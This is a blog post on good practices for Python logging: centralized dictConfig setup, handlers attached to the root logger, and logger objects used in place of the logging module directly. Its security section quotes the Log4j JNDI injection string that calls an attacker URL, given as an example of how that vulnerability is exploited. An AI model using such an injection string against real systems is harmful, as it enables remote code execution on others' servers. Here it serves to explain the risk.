Good practices of using Python logging

Problem Statement

During the maintenance work of a legacy Python project, it's noticed some issues of logging code events.

Outputs not in sequence

The legacy code in some places still uses print() function, and traceback.print_exc() like below,

try:
    #my logic goes here
    print("my output")
except Exception:
    traceback.print_exc()

By default in Python those functions are buffered. print() will send outputs to stdout, and traceback_print_exc() will send output to stderr. If those buffers are not flushed timely or disabled, the output may not in sequence which causes the outputs out of order. 

Logging configuration not centralized and externalized

It's noticed the logging configuration is added in every file using the Python logging. It means the logging configuration is not centralized and externalized for easy usage.

Also when a message is logged, the 'logging' object is used directly instead of using a 'logger' object. The 'logging' object actually uses the root logger by default to record messages, which makes the logging in the code less configurable. 

import logging

logging.basicConfig(
  format="[%(asctime)s.%(msecs)03d %(levelname)s] %(message)s",
  level=logging.INFO)

logging.info("Starting of my code.")

Good practices

Before you read forward, you may want to read the Python tutorial to understand how Python logging works, especially the concepts of logger, formatter, filter, and handler. You may also want to know the logging flow, by referencing to this doc, Logging Advance Tutorial

In order to make the logging in applications to be easily usable and configurable, we apply the below good practices. We call them good practices instead of best practices, because different type of applications may need specific logging solutions to best meet the requirements.

  • Logging events/ messages can be propagated by default. So a good practice is to attach handlers only to the root logger, and let propagation take care of the rest.
  • Set all handlers' log level to be DEBUG always, and let users configure the log level on loggers. And it's only needed on root level when all children loggers are without loglevel setting explicitly. 
  • Logging configuration is run only once at startup.
  • Using logger object to log messages instead of logging object.

Sample Code

import os
from os.path import join
import logging
from logging.config import dictConfig

#Get user's configuration from env variables
LOG_LEVEL = os.getenv('LOG_LEVEL', 'INFO').upper()
LOG_FILTER = os.getenv('LOG_FILTER', '')
if os.getenv("LOG_HANDLERS"):
    LOG_HANDLERS = [i for i in os.getenv("LOG_HANDLERS").split(",")] 
else:
    LOG_HANDLERS = ["console", "file"]

#Decide where to store log files
log_dir = os.path.expanduser('~/logs')
if not os.path.exists(log_dir):
    os.makedirs(log_dir)
log_file = join(log_dir, 'application.log')

logging_config = {
    # Always 1. Schema versioning may be added in a future release of logging
    "version": 1,
    # "Name of formatter" : {Formatter Config Dict}
    "formatters": {
        # Formatter Name
        "standard": {
            # class is always "logging.Formatter"
            "class": "logging.Formatter",
            # Optional: logging output format
            "format": "%(asctime)s\t[%(levelname)s]\t%(name)s|%(lineno)s:\t%(message)s",
            #"format": "[%(asctime)s %(levelname)s]%(filename)s\t%(message)s",
            # Optional: asctime format
            #"datefmt": "%d %b %y %H:%M:%S"
        }
    },
    'filters': {
        'customfilter': {
            '()': logging.Filter,
            'name': LOG_FILTER
        }
    },
    # Handlers use the formatter names and filter names declared above
    "handlers": {
        # Name of handler
        "console": {
            # The class of logger. A mixture of logging.config.dictConfig() and
            # logger class-specific keyword arguments (kwargs) are passed in here. 
            "class": "logging.StreamHandler",
            # This is the formatter name declared above
            "formatter": "standard",
            "level": "DEBUG",
            "filters": ["customfilter"],
            # The default is stderr
            "stream": "ext://sys.stdout"
        },
        # Same as the StreamHandler above, but with different
        # handler-specific kwargs. For later usage.
        "file": {  
            "class": "logging.handlers.RotatingFileHandler",
            "formatter": "standard",
            "level": "DEBUG",
            "filters": ["customfilter"],
            "filename": log_file,
            "mode": "w",
            "encoding": "utf-8",
            "maxBytes": 500000,
            "backupCount": 4
        }
    },
    # Just a standalone kwarg for the root logger
    "root" : {
        "level": LOG_LEVEL,
        "handlers": LOG_HANDLERS
    }
}

logging.config.dictConfig(logging_config)

logger = logging.getLogger(__name__)
logger.info('Current logging LEVEL is {}'.format(LOG_LEVEL))
logger.info('Current logging filter is {}'.format(LOG_FILTER))
logger.info('Current logging handlers are {}'.format(LOG_HANDLERS))
The above configuration file will be imported during the application startup, and then in every python file you can add the below code to start using logging.
import logging

logger = logging.getLogger(__name__)

def myfunction():
    logger.debug("My function starts from here.")

Logging is simple but important and sometimes risky

On December 10th, 2021, NIST published a critical CVE, CVE-2021–44228, of Log4j vulnerability. Though it's in the Java world, but it gives us a reminder of using logging in a secure way. That security breach is estimated to be one of the largest ones in history, considering how widely Java is used, and log4j is used in Java programming.

The vulnerability allows unauthenticated remote code execution. Attackers can take advantage of it by just inserting a line of code like ${jndi:ldap://[attacker_URL]} , and then log4j may download and execute the attacker’s code.

The below 'security consideration' of using Python logging is quoted from the Python manual.

"The logging configuration functionality tries to offer convenience, and in part this is done by offering the ability to convert text in configuration files into Python objects used in logging configuration - for example, as described in User-defined objects. However, these same mechanisms (importing callables from user-defined modules and calling them with parameters from the configuration) could be used to invoke any code you like, and for this reason you should treat configuration files from untrusted sources with extreme caution and satisfy yourself that nothing bad can happen if you load them, before actually loading them."

References



Comments

Popular posts from this blog

Deep-archive an aws S3 bucket with versioning enabled once

Auto-installing NVIDIA device plug-in on GPU nodes only